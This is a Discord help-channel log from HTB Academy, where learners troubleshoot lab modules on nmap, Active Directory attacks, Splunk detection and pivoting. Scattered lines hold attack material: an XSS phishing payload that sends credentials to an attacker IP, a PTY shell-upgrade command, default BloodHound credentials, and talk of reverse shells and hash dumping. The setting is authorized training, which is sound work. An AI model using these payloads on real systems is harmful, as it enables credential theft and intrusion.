#modules

not working for me

idk why

when running in my own machine getting this error.

try without sudo

also did this one

still not working

why not working for me

😦

i suspect the problem here is that you're using an old tool (crackmapexec) and its trying to rely on python libraries that have since been changed/updated

what about this one

ahan after updateing it will solve?

single quote your password

tried not worked.

start simple

can you ping the target?

yeah

i think i have to spawn the target again

btw how can i update py library?

we need to find out if the problem is your command, or if its overall network connection, etc.

yeah just trying by terminating target

or you could use wireshark and see exactly what's happening

Exploit the target and find the hostname of the router in the devicedetails directory at the root of the file system.

can anybody help

Hello

ah by spawning target again nxc works fine. @west canopy thanks mate

its from shells and payloads

Any game hacker here??

which page?

topic infltering unix

.

https://discord.com/channels/473760315293696010/588029217376043023

anybody pls help

i was stuck

wait i am checking

@brave scroll

Can you hack any game??

go ask in general, it is module section

it is illegal. @sturdy hamlet

u can find it is root directory

its asking password

i tried

OK but genrel me Chat nahi kar sakta esa dikhaa rahahe

this channel is for discussing HTB Academy . Not hacking anything else .

native language other than english is ban here.

but if you want to learn: https://academy.hackthebox.com/course/preview/game-hacking-fundamentals

@potent lotus have u upload rce?

Can I poke my head in for a question on Linux fundamentals or am I waiting my turn

done

Just ask

im in the

come in dm

There's not a queue to ask questions

Thanks guys

yeah ask buddy

I'm looking for some help under firewall setup the first question is asking me to start a web server on Port 8080 and here's the steps I've tried so far:

I've tried running HTTP 8080 failed

module and section?

Linux fundamentals, firewall setup

ahan lemme check

Python - m HTTP.server 8080 kinda failed, it started the server but I couldn't interact with it at all

And just tried Apache2 - k and it didn't run

have u tried python3?

try this one "python3 -m http.server"

also is this on pwnbox or your own machine/VM?

Pwnbox

python3 -m http.server 8080

try this one @stone bison

Started the server

or if you want to use apache, you can edit /etc/apache2/ports.conf and have it listen on 8080 instead of 80

└──╼ [★]$ sudo cat /etc/apache2/ports.conf 

# If you just change the port or add more ports here, you will likely also
# have to change the VirtualHost statement in
# /etc/apache2/sites-enabled/000-default.conf

Listen 80   # Change this to 8080 

<IfModule ssl_module>
    Listen 443
</IfModule>

<IfModule mod_gnutls.c>
    Listen 443
</IfModule>

apache kinda feel boring .. for file transfer purpose.. 🙂

great.

It's not letting me input commands

wdym?

In the console I started the server in it's not taking commands or at least not showing me any returns

yes, you have to let it keep running

open a new terminal tab if you need to type other commands

just keep running it and by another bash shell make a file connection toward that connection

Oh my God, thank you guys so much

fast response.

u can ask any question about modules here.

BUT if you do want it to run in the background: python3 -m http.server 8080 &

Absolutely I appreciate you guys

okay i'm gonna go pass out , have great evening everyone

by default it run on port 8000, but u can specify a port to run on that one

Can some explain why does it gave open|filtered. i got confused

simply means nmap is unsure wether they are open ports or not.

thanks and i realised what i missed haha thats why got confused

im having trouble setting up subbrute and using subfinder. anyone who can help? im on the attacking common service module.

getting error on setting up subfinder?

I guess that may have been it. Not Dutch, this name is common in Czechia too.

kind of. have you done this module? i could use some help

not done this module yet. but have used subfinder along ago

can u dm screenshot of your problem? maybe then i can help

Ah okay didnt know that. its common dutch name as well.

Name of da kings!

I’m currently working DETECTING WINDOWS ATTACKS WITH SPLUNK chapter detecting password spraying. I found the answer but i don’t understand how? In the answer I tried the users and there was the answer. I copied the spl syntax in SPLUNK and was trying al the users. Was this the correct way?

Anyways, on Discord, I got by Grimgor Protocolsspoofa. I think HTB is forcing the website name to show up instead.

Yes seems like it.

alright

Hi everyone!
I need your help, guys. I'm absolutely stuck on the Intro to Assembly Language skill assessment - Task 2.

|| Here’s what I did:

I fixed the code and removed the exit part (as mentioned in the tip).
I assembled the code, linked it, and wrote it to a .bin file.
Then, I tried to generate shellcode with msfvenom.
Finally, I sent the shellcode to the server using an nc connection. ||
Can you tell me where I might have gone wrong?

ABUSING HTTP MISCONFIGURATIONS : Advanced Cache Poisoning Techniques

Hey guys!
Currently working on fatget.wcp.htb, but unfortunately couldn’t find any solution at the moment.
Can I have a hint please?

does anybody want to be my first friend ?

no

this channel is for getting help on modules

that is why i want to get to know people , so if you do not want to be friends do not reply ty

yep
Ask what you need?

@dry tartan this isn't general chat, this channel is for help with Academy modules. If you wish to participate in #general - read and follow instructions of #welcome

In the module 'Wi-Fi Penetration Testing Basics', section 'Bypassing Mac Filtering' --> running the 'sudo airodump-ng wlan0mon' command on wlan0mon doesnt works for me (in the screesnhot), even though it is the interface that appears in 'iwconfig'.

do anyone has any idea how to proceed?

The error message provides enough information to understand why the command doesn't work

Try displaying the interfaces present on the machine, if there isn't such an interface create one automatically using one of the tools mentioned in the module

Very Well, Thank you

Hello all! Just starting out with HTB on my professional development. I am working though the vulnerability assessment module now, when it says: Nessus can be accessed at https:// < IP >:8834 what IP address and how do I find that if I am using the pwnbox Virtual Machine?

same section, second question - once I reset wlan0 according to the found hidden network MAC address, I should find the wifi password by myself? because the password in the section's guide does not work

just tested the password and it is working

File Inclusion module
Basic Bypasses section
I'm using firefox, from two days ago till now whenever I deploy a target on any module that has a web app, it wouldn't load on firefox (it just keeps loading) while working on other browsers.

Well then.. I did get the wlan0 interface with the wifi MAC from the first question, I'll look again for what I've missed...

Did you forget you've set a proxy? Other than that clear the cache is worth a try.

Figure it out? Try scrolling to the bottom and starting the lab. You'll be given the IP address once it starts. You're in the right place for help with modules, but visit #welcome to link your account and get full access to the discord.

Hi HTB Community,
I’m working on the Introduction to Python module and need help with a question about finding the third most used word and the most frequent word in a given text. I’ve written my code but every time I submit it, I get an error saying it’s incorrect. I’ve tested it in a local Python environment and it works fine there so I’m unsure what I might be missing.

Hello guys, I've got some sort of stroke with this question on Splunk queries.

"Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all data any suspicious loads of clr.dll that could indicate a C# injection/execute-assembly attack. Then, again through SPL searches, find if any of the suspicious processes that were returned in the first place were used to temporarily execute code. Enter its name as your answer. Answer format: _.exe"

I can do the first part of the question with: index="main" *clr.dll | stats count by Image

I get the result (on the screen), obviously there're SharpHound.exe and randomfile.exe, which call fair amount of suspicion. However, I do not really understand what to do next with it (it doesn't accept neither of them as answer), I investigate further and see that all of them have event code 7 for loaded image but no relation to C# injection or execute assembly attack.

Could anyone please hint me with this one?

Ty for replying, I tried to clean the browser chache and it didn't work, then I intercepted the request from mozzila and chrome to see the difference and it was in the Accept header on the request.
Mozzila :

GET / HTTP/1.1
Host: 83.136.250.78:57974
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Priority: u=0, i

Chrome :

GET / HTTP/1.1
Host: 83.136.250.78:57974
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

When I intercept the http request then edit the Accept header to be like chrome the site loaded successfully.

I don't understand why firfox doing this.

Hey, does anyone know why I might not be able to RDP into this host? I'm using the username and password provided

Are you connected to the vpn?

Yes I am

Hey, I'm doing Module "Password Mutations" (https://academy.hackthebox.com/module/147/section/1391) right now.

Is it intended to take that long to brute the pw of user sam?

[STATUS] 88.06 tries/min, 5548 tries in 01:03h, 88498 to do in 16:45h, 14 active

I don't study http headers enough to be absolutely certain but the accept header looks fine in both. Chrome does have a cache-control value. What if you shift+ctrl+R? That will set Firefox's cache-control to no-cache. You don't have any javascript / ad blockers? Maybe packet cap. Are you even establishing a TCP connection?
Do other webpages work? Very weird issue. 🤷‍♀️

Wait actually no, For me It took 15 minutes +-

thx. The question says "create a mutated wordlist"... i downloaded the ZIP and did hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list.
Did i get this wrong?

I DMed you

Hey so my school doesn’t pop up when I registered, what is the best academy subscription other than that one I guess

Contact support. Https://help.hackthebox.com/en/articles/5987511-contacting-academy-support they might be able to add it if the school matches the requirements

Something strange with my HTB accounts. I have created two accounts so far, and each time I log out, it won't let me log back in. It claims the credentials are incorrect, even though I just made the accounts minutes ago and know exactly what I used. Why is this happening?

Hi Guys i am stuck at Attacking Enterprise Networks -> Web Enumeration & Exploitation 6 & 8
Use the SSRF to Local File Read vulnerability to find a flag. Submit the flag value as your answer (flag format: HTB{}).
Use the XXE vulnerability to find a flag. Submit the flag value as your answer (flag format: HTB{}).

I dont know how to discorver what the name is of the flag
Can someone help me ?

Basically the exploit is in the file upload or reading, ssrf with burp:):)

Then you get the flag after exploit?

LOl nevermind both where in /

and they both where called flag.txt
i thought they had a diffrent name.

😭😭😭

Ur real

I was thinking way to complex

Happens

Don't spoil things from AEN, the module itself is the walk-through

The login works from my phone but not my computer. So I guess the accounts didn't disappear. But on my computer, it claims the credentials are incorrect and won't log me in

Also heavily suggest doing that module blind if on the cpts path

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

^

stuck in broken auth skill assesment, i have found the creds but i think this is not the right path

can anyone help?

You can send me a DM with what you have identified and your potential path.

done, ty

In Getting Started Section > Knowledge Check, I obtained my initial foothold on the system, but I don't have access to any commands like: wget, sudo, apt, su, python, python3, etc. Pretty much everything except cat, cd, and ls. Even when looking at what is installed under /bin and all of the packages we are used to. But still am not able to use them when using absolute pathing.

I also tried using the ||upload_exec|| exploit with the password I got from ||admin.xml|| but that isn't working either. Feel like I'm missing something.

Can anybody help?

What could help you with privilege escalation?

LinEnum or LinPeas, but I can't upload them, right?

I can't check what commands I have access to, or setup a reverse shell

sudo -l

If you did the steps by the instructions, You should had established the foothold via meterpreter. Try enter 'shell' in it for more available functions.

after the shell, Improve your TTY via python:
python3 -c 'import pty; pty.spawn("/bin/bash")'

Linenum and linpeas spits a lot of data out that can just be annoying

I can't use sudo, it says its an unknown command

??

I established foothold, and was able to navigate to user.txt, but that was just though using cd. But I can't access root.txt

one sec

You'll need to follow instructions in #welcome to post screenshots

Anyone has the bloodhound default creds for the pwnbox ?

That is because you need to escalate the privilege first.
The 'shell' command is just to improve the restricted meterpreter to proper shell with more functions such as 'sudo -l' and more stuff

neo4j neo4j

Ok, ill go through this. Thanks!

Finally! After 10 weeks, putting in 10-12 hours a day, and writing 356 pages worth of notes. I have finally completed the Penetration Tester Job Role Path!

You know sometimes I get stuck on something that everyone else here be like “oh yeah this is the! Oh yeah I got it it was sooo easy ..” and I get upset at the world for taking so much of my time like work and friends and things like they are the ones that made me fall in love with hacking but then after days or weeks I get to the solution
And it’s a journey that I like so much also cuz I learn so much along the way
Even if I know the answer and htb says it’s not and apparently it is the answer I just had a space before or after! Or cuz I was completely wrong
But maybe just maybe you guys have advices for me.. so how do you guys deal with wrong answers and what is your approach for finding solutions?
I’ll be much obliged if you have answers for me to be focused or something
Peace! ✌🏾

does cme have a native way of getting the user list to a file or do i need to use some weird bash piping?

Above is the output of smbmap and below i am manually testing for a directory with write permissions is there any way to automate this?

Can't smbmap see permissions to subdirectories also?

If you have creds you could try crackmapexec with --shares

Hi , I need hint for [Resource Lab ]

i am on the same thing and the spidering section cost me sometime cuz it doesnt work probably

had to search the smb share file by file

🙂

Which module/section was that?

which section/module?

AD skill assessment 2

Ah k, its possible to mount a smb share, which makes it easier to look for files.

didn't check if that user had rdp connection, but it is a way for sure

First section 🙂
I need hint for start

Use netexec

whats happened with cme?

Not maintained anymore.

Hi , I ndeed Hint for Resource Machine,
Please giv me hint :)))))))

module "getting started" section "public exploits", i can find the service is Apache 2.4.41, but i can't find this version exploit in metasploit... any idea?

the linux box inside the network of that lab only had cme and i didn't bother transfering nxc

#boxes

ask there

Yeah I don't like those provided boxes, so I just use them as a pivot box and only to run responder and the like.

Can i Ask Question, in dm ?

that was a Path Traversal iirc

i didn't solve that machine so idk

but ask there and u will find someone

google is ur friend, just type this version into it and u will find it

Look closer at the web page

Wtf so obvious am I missing? Where am i supposed to find jeffs pass ? https://academy.hackthebox.com/module/67/section/1637

In the question before, You got to the flag's page, correct?
If so, look further in that page.

omg...thank you very much

Hello. I'm trying to do a module, but right now, when I spawn the target for the module (this also has been happening on labs too for me), it keeps giving me a public ip address with a port number instead of a private IP address like I normally get for the target. Any ideas why?

in windows privesc module section kernel exploit
for the CVE-2020-0668 everytime i run the service i get the connection back to my attack machine but i lose it as soon i get the error from the service saying "The service is not responding to the control function" did you face this issue ?

i know that i can create an account instead of getting a reverse shell but i just want to ask this just to know if i missed something or this is normal for this attack

Can you show the commands you used or screenshots so I can get better understanding of your problem?

i swapped the binary as shown in the section then i started multi/handler on my attack host then i ran this on target host "net start MozillaMaintenance" which send a connection back to my attack host which i received until i get the error message from the service i ran on the target host then i lose it

Because some targets are assigned private and some are assigned public with a port. As for the why, well it's probably easier for them to host a ton of labs on a public IP using ephemeral ports, as those labs aren't locked into requiring an AD environment or similar environment.

I DMed you

When I try to ping it, it says "Name or service unknown".

I dont have issue pinging my own network or 8.8.8.8 or anything else.

Also, does nmap still work normally with a port specified? Since we are scanning ports, does that work the same? (sorry for beginner questions, I'm just confused about that since it makes no sense to me).

@sand rose You sure about that? 'dont' should be 'don't'.
Hmm, not quite. 'nmap' is actually 'map'.

You shouldn't have to run nmap on that type of lab. Which module/section are you working on?

AD attack & enum assessment 2
on the SQL01 machine i got local admin and dumped the sam db but it didn't include all users, how is that possible?

Oracle TNS Footprinting section

"I'm Currently In The process Of Becoming A Ritch And Wealthy Canadian Citizen

What local users are missing?

i believe SAM only contains local accounts. For domain users, you would need to dump the NTDS.dit on the DC.

you could try dumping LSA, there might be some domain user hashes there

l**_adm

yeah i mean local users

Will there be an AD path room?

Wdym?

There are modules for AD

if you mean a dedicated text channel, there will be one once the cert is officially announced

Yeah for the new Active Directory Penetration Tester. I start Monday, so I wanted to see if there was going to be a new channel for that particular path.

Thank you

Did you ever figure this out?

No the form never showed up for me but I was able to solve the potion and I understand the concept so I guess that’s the point.

You can't just use the code from the module. It can be done but you need to tweak the payload.

Windows Privilege Escalation
Credential Hunting

Search the file system for a file containing a password. Submit the password as your answer.
I found the file, however the password inside it didn't solve the question

my guess is that isn't the password it's looking for

i found the stuff one and the web one

Webrequest module:

curl 'http://94.237.59.180:36838/search.php' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Referer: http://94.237.59.180:36838/index.php' -H 'Content-Type: application/json' -H 'Origin: http://94.237.59.180:36838' -H 'Connection: keep-alive' -H 'Cookie: PHPSESSID=1v5a2airpllfll64aa61ssfuao' -H 'Priority: u=0' --data-raw '{"search":"london"}''

Returns ["London (UK)"]%

curl 'http://94.237.59.180:36838/search.php' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Referer: http://94.237.59.180:36838/index.php' -H 'Content-Type: application/json' -H 'Origin: http://94.237.59.180:36838' -H 'Connection: keep-alive' -H 'Cookie: PHPSESSID=1v5a2airpllfll64aa61ssfuao' -H 'Priority: u=0' --data-raw '{"search":"flag"}'

Returns []%

So the flag is []?

both are not working

Yeah probably isn't the right password then..

tbh even if there is another file the stuff one should be an answer or at least the password be a "not this one" cuz it is really badly designed question that way

I just re-did it, found the pw.. make sure you look in more places

solved it but it is really confusing

I hope if they can change it cuz the other password are just a meaningless rabbithole

I have been working for hours in the Cross-Site Scripting (XSS) phising room, I tested in the /phishing extension, the payload works, but all the payloads I send to send.php fail “Invaliad”

'/><script>document.write('<h3>Please login to continue</h3><form action=http://10.10.15.18:8080><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script><!--
my payload

Yeah I figured it out so it’s not an issue now.

Probably because there's already a script tag and you are adding a second one

do i get to keep the completed modules which is part of annual subscription? (Thanks)

Yes, any module you complete is yours forever to keep, even if they update it.

Firewall and IDS/IPS Evasion - Easy Lab (stuck on Target(s) are spawning for 5 mins) and got cancelled for no reason

My target did the same thing, could be a site issue

u did something to fix it or it got fixed on its own? lol

mine's working now.. maybe just a hiccup who knows

try it again and see

yea worked lol that was weird

Hey there

E

Cant get the answer to this
What i have tried :
||The same command from solution(not getting results)||
||-sV flag||
||its showing its open but scripts not working or something ||

Does anyone else get this error in the Pivoting tunneling and port forwarding module, ICMP Tunneling with SOCKS section? I've recompiled the binary 3 different ways but I always get this error on the pivot host

I've attempted the sed compilation method, sudo ./autogen.sh as well as sudo ./compile && make

The program works on my attack host, just not on the pivot host

according to the error you didnt closed a bracket (thats why its saying syntax error)

If that were the case it wouldn't run on my attack host, but it does

having issues with metasploit not connecting to rhost

Looks like it's because it's a C application and my kali pentesting VM has a differeng glibc version than the ubuntu host, leading to a mismatch. It's reported as an issue on the forums (https://forum.hackthebox.com/t/icmp-tunneling-with-ptunnel-ng/268732/9) and it seems like the fix is to either recompile it in another VM that has the same glibc version, or to use a basic dynamic port over SSH with proxychains to get the flag

yea version mismatch of glibc does matter

i prefer compiling it on the target machine tho (if its possible)

Hello. I'm trying to connect to HTB for the SQL injection module, and I'm having issues. Firstly, it's spawning a Public IP address with an ephemeral port (which I've never seen HTB do). Secondly, when I go to ping the target, I'm getting an error saying "Name or service not known". It's the "Intro to MySql" section. Anyone able to shed light?

open it in your browser @sand rose

the public ip + port is because its a docker instance just for you

I used the original in addition to a couple of other IPs (by resetting it) and it tells me the connection was reset in my browser

let me check on my end, one sec

Sure thing

oh my bad, you need to do it with the mysql client on the cli

so example mysql -u root -ppassword -h publiciphere -P porthere

Am I not able to just ping it like normal? (Whenever I get a target, I usually ping to make sure my connection is good).

Not always no

sometimes pinging is not reliable

typically if it's a windows machine it's not enabled

Gotcha. Is this also why I had issues with nmap too? (I know it's a MySql module, but it's more of a habit I have that the moment I get a target I go ping, Nmap, see what I'm looking at, then proceed with the module at hand).

And if I may: Whats the difference between using a ping/nmap packet(s) vs using the cli with mysql. I ask in the sense of aren't they all packets that the server would need to respond to? How does it typically detect what's me trying to connect vs sending a ping?

Different types of packets

Is http://94.237.59.180:48643/ in we request broken? It pings but it's just a blank page

which module

and section

Web requests crud api

It doesn't respond to curls either

probably another endpoint you need to navigate to

yeah, the section shows it's using api.php, try that

http://94.237.59.180:48643/api.php/city

Alright

Module: Signature Wrapping Attack

Does anyone try that module? I can’t exploit successfully…

Hiiii, i need support with the last Active Drectory Skill Assessment exercise, im having a problem with the rdp even if i restart the target

i try to resolve it by myself with stackoverflow but no luck

just port forward it to ur machine

kinda unnecessary, it shouldn't be like this, I read the solution and so far it doesn't mention anything about portfw, it's a problem with the target itself

I'm doing Android Exploitation track: pinned says error parsing package

not a problem with the target

Even if portfw works, there is still a problem with the target, since that is not the "canonical" solution

If you are in an SSH session you simply cannot perform an RDP command within it

The error is comprehensive enough to mention that there isn't a display variable set

^

I did portfw and got rdp, kinda weird but it worked, thanks @autumn pilot @midnight galleon

@grand portal no spoilers; also try visiting it (after adding it to your hosts file)

I did put it behind the ||hidden|| like this. Is that still wrong?

I actually added that to my hosts file nothing showed up, I'll try it again, if it supposed to.

Spoiler text does nothing

Did you try curl?

Okay.

No, what does curl do different than actually visiting webpage?

Just uses a different UA

UA?

User agent

Under Armour

okay

curl is not producing anything, tried port 80 and 443 ports. is it the right subdomain im enumerating?

Should be

Try nc

I honestly forget how I did it

this is how my hosts file should be. right?

blurred is another subdomain that i found.

Make sure no spelling errors

Hi guys. Just asking about the debugging section of the introduction to malware module. I have followed all the steps and consulted the forums but cannot seem to get past the "sandbox detected" message. If someone here can help it would be appricated

yes. i did. im currently trying to explore more subdomains.

did you carefully added breakpoints?

You don't need to

all i need to is query the subdomain i found properly?

yep. followed the direct insturctions, and put it in a new exe as the forums suggested.

you are stuck at the first breakpoint. right? are you sure your breakpoints are working? did you removed the instructions that led to sandbox detected as intructed in the module?

I havent removed anything. Only changed the values like instructe

by the first breakpoint do you mean first one brought up on the actual module or the first place where my program stops?

program. are you using pwnbox?

nah running of ubuntu directly

ild try that. Thanks for your help

it did not work in my case, i had to use pwnbox.

good luck

okay ild try pwnbox.

what would change from my device to pwnbox tho?

something to do w inetsim?

probably, i dont remember the details. I had trouble setting up inetsim on local machine, worked well in pwnbox.

Bingo

no it is just that the pivot box sucks

and generally yeah, in real engagement u won't have much control of these pivot boxes

thanks it worked.

What exactly is the Windows fundamentals question asking me? "Which Windows NT version is installed on the workstation? (i.e. Windows X - case sensitive)"

It wont accept Microsoft Windows 10 Enterprise 10.0.19041 or Windows 10 Enterprise 10.0.19041 or Windows 10 10.0.19041 or 10.0.19041

Windows 10 19041 or Windows 10.0.19041 is also not accepted

What format does it want?

remove build and name

its more simple 😉

So it's literally just fucking "windows 10" errr eyeroll

Hello, I am stuck in the "Network Enumeration with Nmap" module on the hard lab and I can only see ports 22 and 80, I have tried a lot of combinations of what i learned in the module but i had no luck finding the flag. Can anyone help?

In 'Firewall and IDS/IPS Evasion' section they talk about another port. take a peek in that.

I'm gonna suggest to be more broad

Replace the specific port with -p-

I have tried -p- argument but it takes way too long to finish

It shouldn't

oh am i doing smg wrong here it takes forever? i tried to reduce the time with several stuff from the performance page and it only returned ports 22 and 80.

interestingly i focused more on the port 50000 and after adding some arguments i managed to get it open|filtered but when i try to put arguments like -sV it appearse closed

I remember in that module using -p- didn't work for me back then. Maybe I should revisit that module 😅

-sS

Also you need to use a source port 😉

yepp i used source port 53

on tcp scans the ports shows as filtered so i used the -sU

Can anyone tell me the first question of the skill assessment of "Stack-Based Buffer Overflows on Linux x86"?
It asks "Determine the file type of "leave_msg" binary and submit it as the answer." but this question is too vague. I know it's "leave_msg: setuid ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=8694607c1cba3fb3814a144fb014da53d3f3e49e, not stripped" but I can't figure out the exact answer...

Hi, I cannot finde the flag in the Repeating Requests in the Using Web Proxies module. The hint denotes that it is in a subdirectory. I tried the public directory, there are just one html and one ss file, none of them contain the flag. I suppose, that the flag is in a file called file.txt. Can somebody tell me where I need to search for the flag?

Hello. I'm having isses connecting up to the mysql database for the htb academy module. I'm trying to connect to it the way it tells me, but I keep getting an error saying "Can't connect to local server through socket '/run/mysql/mysqld.sock'"

Im connected to the vpn, and my internet connection is also fine. I've been trying to use the IP:Port format and using -P to specify the port and it's to no avail. I'm not sure what I'm doing wrong here.

Have you port scanned? Make sure the port is responding to requests. Sometimes it helps to restart the lab and redownload the VPN -- or change regions and perform both actions again. Just some suggestions, you'll have to do a little troubleshooting when something unexpected happens.

@shut vapor I've done the following: Restarted the VPN connection, restarted the Virtual Machine (Using VMware). Redownloaded the VPN connection. Tried connecting without the VPN connection (the target was showing as a public IP so I figured to try that). Tried various cli inputs the module showed to tried to connect up to it.

When I go to ping it, it says "name or service unknown". Nmap keeps showing "host seems down".

Ive done the above with multiple targets (all giving me a public ip and an ephemeral port).

I tried both defaulting to the localhost server and docker.hackthebox.eu (something in the module that showed as a cli to try to connect up). All of it has been to no avail.

I tried both defaulting to the localhost server and docker.hackthebox.eu (something in the module that showed as a cli to try to connect up). All of it has been to no avail.

If you're not able to ping or verify open ports something's wrong but it's hard for me to offer further troubleshooting advice. As a sanity check sometimes I try in the pwnbox to make sure it's something with my system.

The target is public though? What module and section is this?

the sql injectin module "Intro to mysql"

the target is 94.237.59.180:55372

So I opened pwnbox (through firefox on my VM)... and I can ping it just fine from there?

I just tried pinging again from my VM and now I can ping it just fine... when I use nmap on my VM it says the host seems to be down.... when I use nmap from within pwnbox (from inside my VM), I can scan it properly. Any guesses?

I see, the target is a docker instance

it is a public IP so if you' can't ping / otherwise interact with that IP from your VM I'd bet you can't interact with anything really.

If you can do it from pwnbox it's definitely your VM. I fired up the exercise and connected so I know it works. I would expect you to encounter an error you must overcome, but it's not the one you reported.

Its weird because I can ping it from my vm but not nmap it weirdly?

I can also ping and nmap my own local network perfectly fine from my vm as well, so I sincrely not sure. I'll probably just finish it through pwnbox since that seems to be working normally... I just sincrely not sure what the issue is.

I appreciate your help though :).

this is a Docker Container. Only this one port is available to you. If you ping the machine, your target does not respond, but the host machine does. However, this has absolutely nothing to do with your target.

Hello, I just created an account in HTB academy and it's not letting go through the paths

What exactly do you mean by, it won't let me go through the paths?

When I put the cursor on Paths, it says javascript: void(0)

I'm confused here... imma go learn about what dockers are and how they work before coming back to this. I appreciate your help :).

In simple terms, a Docker container simply provides you with a service, for example a web server.
Several Docker containers can run on one server.

Turn off all AdBlockers and reload the page.

I am doing the windows command line module and i am having a porblem wiht a question "What command will give us a listing of all files and folders in a specified path?" i have tried dir , dir /A , tree , tree <path>

every thing is wrong what is the correct answer here

is container track deleted? in app.htb

Have a look at the cheat sheet.

cheat sheet also mention the same commands that i have tried

got it done i was putting a wrong parameter to the command

how to get the hacker badge in htb?

what needs to be completed or reqs ??

#spoiler Hey inthe attack enterpize module on the active directory compermize section we would add a user ttimons onto a target group after that i try to dump the ntlm password hashes using secretsdump ttimons and use ttimons password we get after cravking a hash but it gets errord out

would appreciate spoiler tags on AEN questions

Any help

is there a possibility to create separate channels for each module? the current state of modules chat makes the search for information on a specific module frustrating to the point it is better to just ask copilot even though it is bad when it comes to such knowledge..

having dedicated channel for a every module ease the process of asking, answering, searching for previously asked questions tremendously

there are over 100 modules, it is not feasible

additionally, in a single channel your chance of finding something relevant is higher

Hey guys!
https://academy.hackthebox.com/module/143/section/1489

when run mimkatz I'm getting ERROR kull_m_rpc_drsr_getDCBind ; RPC Exception 0x00000005 (5) (after runas). I even tried re-spawing the target but still same.

Are you running as admin?

yes

Me too. Have tried many combinations and I can't pass it...

did you use privilege::debug

yes

i believe that exception means access denied, so your user probably doesn't have the privs to perform a dcsync

but I'm running on adunn's session (runas)

Also on a side note - why there are 2 machines spawned - ACADEMY-EA-MS01 & ACADEMY-EA-ATTACK01?

read the scenario setup section

I cannot ssh from MS01 with same credentials?

but I should be doing the same with mimikatz too?

@cloud urchin any suggestions?

can you ssh with the creds it provides in that part of the section

i tried that too, no luck. confirmed by pasting in a notepad to see if its there in clipboard or not

i mean that's what it says to do, not sure without checking it myself but i'm busy right now unfortunately so i can't test it for you

iirc i think i had to use pwnbox becuase of the way it scrolled the terminal when running mimikatz through that ssh session

the only reason i find it feasible is grouping all relevant information in a single place

i hate when rdp doesnt work

let me try from pwnbox

same error

How can over 100 channels just for modules be moderated in a meaningful way?
This is not feasible

if you mean who will answer questions, the community will, most of the questions are already answered at least once, so scrolling between all relevant information until i find someone talked about specific thing would be easier (because discord doesn't have information retrieval system aka search engine to assist in the search functionality)..

but if you mean moderating the exposed content on the chat, then it will be almost impossible 🙂

I'm not worried about the questions.
But how are we mods supposed to find indecent content in over 100 channels?
That is impossible.

yeah if it is manual moderation then its impossible

hey guys i had less of hard module question and more of soft one, i'm almost done with the Linux Fundamentals module. And this last bit is comparing and contrasting Solaris vs. Linux. How important is understanding the differences between the two systems? Should take notes on this section or should i just move on?

You can also quickly find the difference between Linux and Solaris with a search query in a search engine of your choice. You probably don't need any notes. It is only important to understand that there is a difference.

cool thanks man

I'm just curious (if there's any HTB staff around), do you make the art on the cover images of the modules in academy yourselves?

The art is in general very awesome, and I was wondering if it's copyrighted or something. I was thinking about having something from there printed on a shirt because the aesthetics are too good, so I wanted to ask to see if it's not an issue for me to consider at some point of time

if you stay till you know every unmentioned detail you gonna do HTB academy absolutely forever.. you need to know "just enough", details come over the time 🙂

i'm willing to do the work for the fundamental stuff, like learning Linux and Windows better. because it's fundamental, and that effort will translate to more than just pentesting, but you're absolutely right i don't want to do this again

There is a search bar by the way, and you can include search parameters ("contains word: wordpress, before:yesterday, in: #red-team "), etc.

I've found that it's generally helpful when searching for some particular topic, such as a challenge name or a topic name

oh cool!, where can i find the full list of the discord search parameters?

i thought there are only the basic stuff such as from:@user

Think it depends on the device, but you can see if you're on PC (I'm using browser on PC)

https://support.discord.com/hc/en-us/articles/115000468588-Using-Search

If it doesn't work with one tool/technique/method, try a different one.

Attacking Common Applications
Exploiting web vulnerabilities in thick client applications

So...I modified the Invoker and the ClientGUI thingy, compiled it and made the traverse jar, instead of doing it 1 by 1 and taking time.

For some reason, the .jar displays the content of the file instead of downloading it. I have used the 1:1 script provided in the module, anyone got an idea what could be the issue?

If someone is down, I can even stream my actions 1 by 1 to see what's wrong, but I am stuck for about 2+ weeks on that.

Hey anyone know the path i should take if i wana hack online games(server-sided)

I wouldn't condone that.

Holy shit the last module before skill assessment in pivoting is so fucking slow

Give it time to load.

Yea ive given it way too much time

I'm trying to upload a file it's literally taking me 30 minutes just to type commands and extract the zip file

Hey GodBreak.

1. Get into the Hacker mindset; you have to learn to think deeply about how games work and how you can hack them

2. Learn programming languages required: C++ Is what the online games are in, and then you can learn Python for your own programming when attacking things

3. Time to put your knowledge in action; start reverse engineering, doing static and dynamic analysis on games and applications -- starting from small stuff and reaching to big stuff

Please do not randomly assume that people who are learning here are being or are going to be illegal.

Game hacking is taught by HTB, and HTB does NOT condome learning how to game hack.

Please do not discourage people from using the HTB modules by scaring them away.

they asked for server-side game hacking. that's not taught by HTB.

those two modules are for hacking games offline/client-side

and hacking server-side without permission is the same thing as unauthorized testing, which is illegal. cheating in online games isn't something that HTB condones either

Stop telling people not to learn -- and stop telling people that they are illegal

